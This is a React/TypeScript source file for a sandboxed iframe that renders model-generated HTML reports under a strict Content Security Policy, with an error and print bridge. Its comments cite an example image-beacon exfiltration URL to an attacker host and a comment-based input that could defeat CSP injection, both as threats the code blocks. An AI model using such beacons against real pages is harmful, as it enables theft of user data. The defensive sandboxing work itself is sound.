import { forwardRef, useCallback, useEffect, useImperativeHandle, useMemo, useRef } from "react"

// CSP: inga nätverksanrop (connect-src 'none'), scripts/styles inline + whitelistade CDN:er.
// Modellen instrueras att hålla rapporter helt självständiga; CDN-listan är en ventil
// för ev. bibliotek. Bilder tillåts enbart via data: (https: borttaget för att blockera
// beacon-exfiltrering via <img src="https://attacker/?d=DATA">). form-action 'none'
// blockerar formulärbaserad navigation/exfiltrering — well-supported, till skillnad från
// navigate-to som saknar Chromium-stöd och bara loggade CSP-fel.
// allowEval lägger 'unsafe-eval' i script-src ENBART för react (Babel-i-browser kräver det);
// html förblir strikt utan 'unsafe-eval'.
function buildCsp(allowEval: boolean): string {
  const scriptSrc = allowEval
    ? "script-src 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://unpkg.com https://cdn.jsdelivr.net https://cdn.tailwindcss.com"
    : "script-src 'unsafe-inline' https://cdnjs.cloudflare.com https://unpkg.com https://cdn.jsdelivr.net"
  return [
    "default-src 'none'",
    scriptSrc,
    "style-src 'unsafe-inline' https://cdnjs.cloudflare.com https://fonts.googleapis.com",
    "font-src https://fonts.gstatic.com data:",
    "img-src data:",
    "connect-src 'none'",
    "form-action 'none'",
  ].join("; ")
}

// Early error-capture script — injected in <head> BEFORE model scripts so that
// inline script errors that fire during page load are not lost.
const ONERROR_SCRIPT = `<script>
window.onerror = function (message) {
  parent.postMessage({ type: "artifact-error", message: String(message) }, "*");
};
window.addEventListener("message", function (event) {
  if (event.data && event.data.type === "artifact-print") { window.print(); }
});
</script>`

// Preserve background colours/gradients when the user "Save as PDF" via the print
// dialog — browsers strip them by default unless print-color-adjust is exact.
const PRINT_STYLE = `<style>@media print{html,body,*,*::before,*::after{-webkit-print-color-adjust:exact !important;print-color-adjust:exact !important;}}</style>`

/** Builds the sandboxed srcdoc: CSP meta + model HTML + error/print bridge. */
export function buildSrcDoc(html: string, options?: { allowEval?: boolean }): string {
  const cspMeta = `<meta http-equiv="Content-Security-Policy" content="${buildCsp(options?.allowEval ?? false)}">`
  const trimmed = html.trim()
  const isFullDocument = /^<!doctype html/i.test(trimmed) || /^<html[\s>]/i.test(trimmed)
  if (isFullDocument) {
    // Inject a trusted <head> (CSP meta + error bridge) immediately after <html>,
    // BEFORE any model markup, so the browser parses our CSP before any model
    // script runs. We deliberately do NOT search the document body for a
    // "<html ...>"-shaped substring: a stray match inside an HTML comment,
    // script string, or code sample can appear before the real tag, and a
    // first-match replace would splice the CSP into inert text — silently
    // dropping enforcement (e.g. `<!doctype html><!-- <html> --><html>...`
    // matches the commented-out fake first). Instead we anchor with `^` on
    // the already-trimmed doc: isFullDocument guarantees it starts with
    // either `<!doctype` or `<html`, so an anchored match is provably the
    // real leading token, never something later in model-controlled text.
    // The model's own <head>, if present, becomes a second head whose
    // contents the parser reprocesses (scripts still run, still constrained
    // by our CSP).
    //
    // C1: keeping the bridge in <head> also avoids the first-match </body> bug — no
    // injection at body close is needed, so a </body> inside a model script string
    // can't be mistargeted.
    const trustedHead = `<head>${cspMeta}\n${PRINT_STYLE}\n${ONERROR_SCRIPT}</head>`
    let doc = trimmed
    if (/^<!doctype[^>]*>/i.test(doc)) {
      // <!doctype html> (with or without a following <html> tag): insert the
      // head right after the doctype, which the HTML parser will still place
      // inside the (possibly implied) <html><head> before any model markup.
      doc = doc.replace(/^<!doctype[^>]*>/i, (m) => `${m}\n${trustedHead}`)
    } else {
      // No doctype: isFullDocument guarantees doc starts with `<html`, so the
      // anchored match at position 0 is genuinely the real opening tag.
      doc = doc.replace(/^<html[^>]*>/i, (m) => `${m}\n${trustedHead}`)
    }
    return doc.startsWith("<!") ? doc : `<!DOCTYPE html>\n${doc}`
  }
  return `<!DOCTYPE html>
<html>
<head>
${cspMeta}
${PRINT_STYLE}
${ONERROR_SCRIPT}
<meta charset="utf-8">
</head>
<body>
${trimmed}
</body>
</html>`
}

export type SandboxFrameHandle = { requestPrint: () => void }

type SandboxFrameProps = {
  html: string
  title: string
  onRuntimeError?: (message: string) => void
  allowEval?: boolean
}

export const SandboxFrame = forwardRef<SandboxFrameHandle, SandboxFrameProps>(function SandboxFrame(
  { html, title, onRuntimeError, allowEval },
  ref
) {
  const iframeRef = useRef<HTMLIFrameElement>(null)
  const srcDoc = useMemo(() => buildSrcDoc(html, { allowEval }), [html, allowEval])

  const handleMessage = useCallback(
    (event: MessageEvent) => {
      if (event.source !== iframeRef.current?.contentWindow) return
      const data = event.data as { type?: string; message?: string } | null
      if (data?.type === "artifact-error" && onRuntimeError) {
        onRuntimeError(data.message ?? "Unknown error")
      }
    },
    [onRuntimeError]
  )

  useEffect(() => {
    window.addEventListener("message", handleMessage)
    return () => window.removeEventListener("message", handleMessage)
  }, [handleMessage])

  useImperativeHandle(
    ref,
    () => ({
      requestPrint: () => {
        iframeRef.current?.contentWindow?.postMessage({ type: "artifact-print" }, "*")
      },
    }),
    []
  )

  return (
    <iframe
      ref={iframeRef}
      className="h-full w-full border-0 bg-white"
      // allow-modals: required for window.print() / PDF export.
      // alert/prompt also become available as an accepted, contained trade-off —
      // they cannot reach the parent origin because there is no allow-same-origin.
      referrerPolicy="no-referrer"
      sandbox="allow-scripts allow-modals"
      srcDoc={srcDoc}
      title={title}
    />
  )
})
